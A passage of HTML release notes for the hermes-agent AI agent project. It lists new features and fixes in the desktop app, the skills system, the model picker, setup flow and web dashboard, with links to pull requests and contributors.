data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37211/hovercard">#37211</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38205" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38205/hovercard">#38205</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38600" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38600/hovercard">#38600</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Hermes Desktop speaks Simplified Chinese — full 简体中文 in the chat GUI</strong> — The desktop app now ships a complete Simplified Chinese (简体中文) translation across every UI surface — the chat window itself, sidebar, settings, command center, cron, messaging, profiles, skills, agents, the lot. English stays the default; switch language in Appearance settings and the choice persists to your config (<code>display.language</code>). It's built on a proper typed i18n layer, so adding more languages from here is straightforward. (<a href="https://github.com/NousResearch/hermes-agent/pull/38241" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38241/hovercard">#38241</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JimLiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JimLiu">@JimLiu</a>)</p>
</li>
<li>
<p><strong>Leaner default skill set — Hermes ships only what you actually need</strong> — The bundled skill set got a deliberate trim. Skills that were redundant or dead are gone (<code>spotify</code> — superseded by the native Spotify plugin's 7 tools; <code>linear</code> — superseded by <code>hermes mcp install linear</code>; <code>kanban-codex-lane</code>, <code>debugging-hermes-tui-commands</code>, a stale <code>domain</code> orphan, and several empty category markers). Heavier or niche skills moved from bundled to optional (the Baoyu creative set, <code>dspy</code>, <code>subagent-driven-development</code>, <code>minecraft-modpack-server</code>, <code>pokemon-player</code>, <code>hermes-s6-container-supervision</code>) — still one <code>hermes skills install</code> away, just not loaded by default. And a new <code>environments:</code> relevance gate keeps context-specific skills (kanban, docker/s6) out of the skills index for users who'll never use them, while still loading them on explicit request. The result: a smaller, sharper default skill list, less noise in the picker, and a lighter prompt. The curator can now prune unused <strong>built-in</strong> skills too (not just agent-created ones), with usage tracked for every skill. (<a href="https://github.com/NousResearch/hermes-agent/pull/39028" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39028/hovercard">#39028</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36701" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36701/hovercard">#36701</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36228" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36228/hovercard">#36228</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>NVIDIA/skills is now a built-in trusted skills tap</strong> — <code>NVIDIA/skills</code> joins OpenAI, Anthropic, and HuggingFace as a default trusted tap in the Skills Hub — discoverable, browsable, searchable, and auto-updating through the same pipeline. NVIDIA's verified skills for CUDA-X, AIQ, cuOpt and the rest of their product stack are one install away, with real category labels from the repo's <code>skills.sh.json</code> sidecar. (<a href="https://github.com/NousResearch/hermes-agent/pull/34333" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34333/hovercard">#34333</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Quick Setup via Nous Portal — from install to first message in seconds</strong> — First-time setup was thinned down to two clear paths: Quick Setup (sign in with Nous Portal, get a model picker, start chatting immediately) or Full Setup (the detailed wizard for power users). <code>hermes portal</code> is now the human-readable alias that runs the full quick-setup Nous flow. The first-run menu explains the difference inline so newcomers aren't guessing. The goal: a brand-new user shouldn't need to read docs to send their first message. (<a href="https://github.com/NousResearch/hermes-agent/pull/35723" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35723/hovercard">#35723</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36227" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36227/hovercard">#36227</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38449/hovercard">#38449</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38465" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38465/hovercard">#38465</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</p>
</li>
<li>
<p><strong>Fuzzy model picker, everywhere — type a few letters, find your model</strong> — The model picker now does fuzzy search across the desktop app, web dashboard, TUI, and CLI. Type "v4fl" and <code>deepseek-v4-flash</code> surfaces; multi-endpoint providers are grouped under one row instead of cluttering the list with duplicates, and each row carries a description so you know what you're picking. The catalog refreshes hourly instead of daily, so new models show up the same day they launch. New this window: <code>deepseek-v4-flash</code>, <code>MiniMax-M3</code> with 1M context, <code>qwen3.7-plus</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/36928" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36928/hovercard">#36928</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35227" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35227/hovercard">#35227</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35756/hovercard">#35756</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35659" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35659/hovercard">#35659</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36214" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36214/hovercard">#36214</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong><code>/undo [N]</code> — take back the last N turns</strong> — Said the wrong thing, or sent the agent down a bad path? <code>/undo</code> backs up N user turns, prefills your last message so you can edit and resend, and soft-deletes the turns in between. It works in the CLI, the TUI, and across messaging platforms (Telegram, Discord, etc.) with full parity. Closes a long-standing request (<a href="https://github.com/NousResearch/hermes-agent/issues/21910" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/21910/hovercard">#21910</a>). (<a href="https://github.com/NousResearch/hermes-agent/pull/36229" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36229/hovercard">#36229</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36699" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36699/hovercard">#36699</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Choose your default interface — <code>cli</code> or <code>tui</code></strong> — You can now set whether <code>hermes chat</code> drops you into the classic CLI or the Ink TUI by default, with a <code>--cli</code> flag to override per-invocation. The TUI also got a single unified <code>/model</code> command and a Sessions overlay for switching between live sessions. Use the interface you actually like. (<a href="https://github.com/NousResearch/hermes-agent/pull/37782" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37782/hovercard">#37782</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37112" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37112/hovercard">#37112</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
</ul>
<hr>
<h2>🖥️ Hermes Desktop App (NEW)</h2>
<h3>Install &amp; lifecycle</h3>
<ul>
<li>macOS desktop install + in-app self-update; rebuild-and-relaunch cleanly on macOS (<a href="https://github.com/NousResearch/hermes-agent/pull/35607" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35607/hovercard">#35607</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36198" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36198/hovercard">#36198</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38296" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38296/hovercard">#38296</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>macOS installer renamed to "Hermes" and turned into a launcher (<a href="https://github.com/NousResearch/hermes-agent/pull/37516" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37516/hovercard">#37516</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Build desktop in its own <code>desktop</code> stage on macOS/Linux instead of silently skipping; content-hash build stamp, <code>--build-only</code> / <code>--force-build</code> flags (<a href="https://github.com/NousResearch/hermes-agent/pull/36134" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36134/hovercard">#36134</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37597" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37597/hovercard">#37597</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
<li>Boot-failure recovery + live API-key validation; cancellable install; recover from corrupt cached Electron download (<a href="https://github.com/NousResearch/hermes-agent/pull/35864" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35864/hovercard">#35864</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37379" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37379/hovercard">#37379</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39032" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39032/hovercard">#39032</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Windows: recover from corrupt Electron cache in bootstrap install; stop racing our own backend during in-app update (<a href="https://github.com/NousResearch/hermes-agent/pull/39465" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39465/hovercard">#39465</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39828" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39828/hovercard">#39828</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Linux: configure Electron sandbox helper; detect linux arm64 binary; disable GPU acceleration on remote displays to stop flicker (<a href="https://github.com/NousResearch/hermes-agent/pull/37691" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37691/hovercard">#37691</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38594" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38594/hovercard">#38594</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37932" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37932/hovercard">#37932</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Require Node ≥20.19/22.12 for the desktop build; zero eslint/typecheck debt + prettier pass (<a href="https://github.com/NousResearch/hermes-agent/pull/38255" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38255/hovercard">#38255</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39100" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39100/hovercard">#39100</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Remote-gateway &amp; multi-profile</h3>
<ul>
<li>Connect to OAuth-gated remote gateways; username/password login for remote gateways; per-profile remote gateway hosts (<a href="https://github.com/NousResearch/hermes-agent/pull/37888" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37888/hovercard">#37888</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38851" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38851/hovercard">#38851</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39778" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39778/hovercard">#39778</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Concurrent multi-profile sessions, cross-profile <code>@session</code> links; re-mint OAuth WS ticket on gateway reconnect; gate OAuth remote connect on AT-or-RT (<a href="https://github.com/NousResearch/hermes-agent/pull/39330" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39330/hovercard">#39330</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38886" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38886/hovercard">#38886</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39464" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39464/hovercard">#39464</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li>Offer remote sign-in on a gated-gateway boot failure; validate live WebSocket in remote gateway test (<a href="https://github.com/NousResearch/hermes-agent/pull/39402" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39402/hovercard">#39402</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39511" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39511/hovercard">#39511</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Chat UX &amp; settings</h3>
<ul>
<li>Drop files anywhere in the chat area; clipboard image paste with dedupe; attachments on Enter, IME composition handling (<a href="https://github.com/NousResearch/hermes-agent/pull/36262" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36262/hovercard">#36262</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38306" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38306/hovercard">#38306</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38677" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38677/hovercard">#38677</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Background needs-input indicator, clarify redesign, Cmd+K palette &amp; UI consistency pass; inline model picker in the status bar; YOLO toggle in the status bar (TUI parity) (<a href="https://github.com/NousResearch/hermes-agent/pull/38631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38631/hovercard">#38631</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37738" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37738/hovercard">#37738</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38517" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38517/hovercard">#38517</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Session-list overhaul, session hygiene/archive, media streaming + connecting overlay; search sessions by id (SQL-bounded) (<a href="https://github.com/NousResearch/hermes-agent/pull/37379" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37379/hovercard">#37379</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37099" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37099/hovercard">#37099</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39062" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39062/hovercard">#39062</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Dedicated Providers settings + polished Accounts/API-keys UX; consolidate skills + tools management into one pane; move model management into Settings (<a href="https://github.com/NousResearch/hermes-agent/pull/38551" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38551/hovercard">#38551</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37310" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37310/hovercard">#37310</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37330" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37330/hovercard">#37330</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>)</li>
<li>Render approval/sudo/secret prompts so tools stop silently timing out; surface skill &amp; quick-command slash commands in the palette; first-class xAI Grok OAuth provider in the launcher (<a href="https://github.com/NousResearch/hermes-agent/pull/38578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38578/hovercard">#38578</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38531" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38531/hovercard">#38531</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37697" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37697/hovercard">#37697</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>"Choose provider later" skip on first-run onboarding; onboarding can configure a local/custom endpoint without an API key; custom zoom shortcuts (<a href="https://github.com/NousResearch/hermes-agent/pull/39483" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39483/hovercard">#39483</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38572" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38572/hovercard">#38572</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37894" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37894/hovercard">#37894</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
<li>macOS helper microphone entitlement; scroll-jump fixes (native anchoring, at-rest jump, wheel-up snap-back); thinking block stays open mid-streaming (<a href="https://github.com/NousResearch/hermes-agent/pull/37745" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37745/hovercard">#37745</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxxigm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxxigm">@xxxigm</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37866/hovercard">#37866</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38221" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38221/hovercard">#38221</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38809" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38809/hovercard">#38809</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stremtec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stremtec">@stremtec</a>)</li>
<li>GUI quality-of-life triage batch; salvaged AhmetArif0 desktop/dashboard fixes; rename session via <code>session.title</code> RPC so <code>/title</code> works (<a href="https://github.com/NousResearch/hermes-agent/pull/37536" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37536/hovercard">#37536</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39070" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39070/hovercard">#39070</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39410" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39410/hovercard">#39410</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li><code>hermes debug share</code> / <code>/debug</code> / <code>hermes logs</code> now include <code>desktop.log</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/38203" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38203/hovercard">#38203</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Simplified Chinese (简体中文) translation</strong> across every desktop UI surface — typed i18n layer, switch in Appearance settings, persisted via <code>display.language</code> (English remains default) (<a href="https://github.com/NousResearch/hermes-agent/pull/38241" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38241/hovercard">#38241</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JimLiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JimLiu">@JimLiu</a>)</li>
<li>Full multi-profile support over one global-remote dashboard; remote-profile sessions are first-class (resume, read, rename/archive/delete); new chats honor their profile in global-remote mode (<a href="https://github.com/NousResearch/hermes-agent/pull/39921" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39921/hovercard">#39921</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39894" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39894/hovercard">#39894</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39993" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39993/hovercard">#39993</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h2>📊 Web Dashboard</h2>
<h3>Administration panel (NEW)</h3>
<ul>
<li>Full administration panel — MCP catalog with enable/disable toggles, pairing, webhooks, credentials, memory, gateway, hook creation, system settings (<a href="https://github.com/NousResearch/hermes-agent/pull/36704" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36704/hovercard">#36704</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36736" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36736/hovercard">#36736</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Channels page — set up every gateway messaging channel from the browser (<a href="https://github.com/NousResearch/hermes-agent/pull/37211" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37211/hovercard">#37211</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
